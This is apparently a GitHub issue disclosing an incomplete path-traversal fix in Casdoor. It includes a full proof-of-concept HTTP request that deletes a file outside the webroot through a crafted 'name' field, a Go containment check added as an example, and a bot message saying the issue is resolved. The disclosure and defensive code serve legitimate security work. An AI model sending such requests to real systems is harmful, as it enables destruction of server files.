Hi,
I was looking at the fix to #1035:
And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable. Thus, it's possible to delete any file outside the application's webroot:
POC request:
```
POST /api/delete-resource?provider= HTTP/1.1
Host: localhost:8008
Content-Length: 363
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://localhost:8008
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8008/resources
Accept-Encoding: gzip, deflate
Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
Connection: close

{"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}
```
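A containment check for the client-supplied `name` field in the request above, as an added example that is not part of the original issue and is not Casdoor's code. The function name `resolveInRoot` and the storage root `/srv/app/files` are hypothetical; the check is lexical only and does not resolve symlinks.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when a resource name resolves outside the storage root.
var ErrOutsideRoot = errors.New("resource path escapes storage root")

// resolveInRoot (hypothetical helper) joins a client-supplied resource name
// onto root and returns the cleaned absolute path, or ErrOutsideRoot if the
// result is the root itself or lies outside it. Call it before any delete,
// not only before upload.
func resolveInRoot(root, name string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "avatar/../../tmp/x" collapses to its real
	// lexical location before the containment check below.
	target := filepath.Join(absRoot, name)
	rel, err := filepath.Rel(absRoot, target)
	if err != nil {
		return "", err
	}
	// "." would mean deleting the root itself; ".." or "../..." is an escape.
	// A file literally named "..foo" stays allowed because of the separator.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return target, nil
}

func main() {
	root := "/srv/app/files" // assumed storage root, not from the issue
	// Constructed inputs: the name from the PoC body and the legitimate avatar path.
	for _, name := range []string{"/avatar/../../tmp/test.txt", "/avatar/built-in/admin.jpeg"} {
		p, err := resolveInRoot(root, name)
		fmt.Printf("%q -> %q, err=%v\n", name, p, err)
	}
}
```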
@seriouszyx @ComradeProgrammer @Resulte
🎉 This issue has been resolved in version 1.126.1 🎉
The release is available on GitHub release
Your semantic-release bot 📦🚀